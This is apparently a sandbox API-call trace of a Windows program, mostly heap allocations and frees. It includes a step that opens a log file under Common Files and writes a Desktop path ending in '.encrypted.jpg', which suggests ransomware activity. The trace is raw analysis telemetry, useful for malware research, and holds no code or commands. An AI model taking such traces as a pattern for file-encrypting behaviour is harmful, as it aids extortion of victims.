HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c75d0 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0030.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0030.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0030.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0030.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0030.107] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.107] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0030.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.107] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0030.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0030.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0030.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0030.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.107] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.107] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.107] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.107] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.107] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.107] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.108] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0030.108] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.108] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0030.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.108] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0030.108] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x2a7, lpOverlapped=0x0) returned 1 [0030.108] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0030.108] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x2a7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.108] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0030.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.encrypted.jpg\r\n", cchWideChar=71, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 71 [0030.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x47) returned 0x88e138 [0030.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.encrypted.jpg\r\n", cchWideChar=71, lpMultiByteStr=0x88e138, cbMultiByte=71, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Nhz507zeCNmw5OeL.encrypted.jpg\r\n", lpUsedDefaultChar=0x0) returned 71 [0030.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0030.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0030.108] WriteFile (in: hFile=0x128, lpBuffer=0x7f36e0*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f36e0*, lpNumberOfBytesWritten=0x6aee3c*=0x46, lpOverlapped=0x0) returned 1 [0030.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0030.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.109] CloseHandle (hObject=0x128) returned 1 [0030.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0030.110] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0030.110] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0030.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0030.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0030.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0030.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0030.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0030.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.111] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0030.111] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.111] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0030.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0030.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.111] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0030.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af558 [0030.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0030.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0030.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0030.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0030.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca48 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0030.112] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0030.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0030.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0030.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0030.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0030.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0030.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0030.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 